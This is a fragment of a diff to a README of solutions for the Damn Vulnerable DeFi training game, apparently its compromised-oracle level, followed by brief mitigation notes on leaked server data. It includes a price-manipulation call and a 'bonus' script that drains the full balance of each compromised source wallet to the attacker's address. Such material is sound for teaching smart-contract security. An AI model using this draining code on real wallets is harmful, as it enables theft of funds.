lior-abadi/damn-vulnerable-defi-solutions/README.md

         // Placing the NFT price back to its older price. await manipulatePrice("999");
+⠀
+⠀

+**Bonus Track**

+This level leaves a bonus track that can be done as an easter egg!
+It does not checks the final balance of each source... but we can also drain them by calling the following script!

+        // BONUS.
+We can also drain each source address! const drainSources = async () => {
+            for(const wallet of sourceWallets){

+                let walletBalance = await ethers.provider.getBalance(wallet.address)
+                await wallet.sendTransaction({to: attacker.address, value: walletBalance})
+                walletBalance = await ethers.provider.getBalance(wallet.address)
+                expect(walletBalance).to.equal(0);
+            }
+            console.log("Successfully drained each source!")
+        }
+        await drainSources();

 ### Learnings - Mitigations
 - The main vulnerability in here is the Web2-side of the project.
 While using sensible data, it is advised to use one way encoded formats of that data in order to prevent this scenarios.
 - Knowing how and what information is available to be queried from our server also helps.

+**The contracts are not always the weak point!**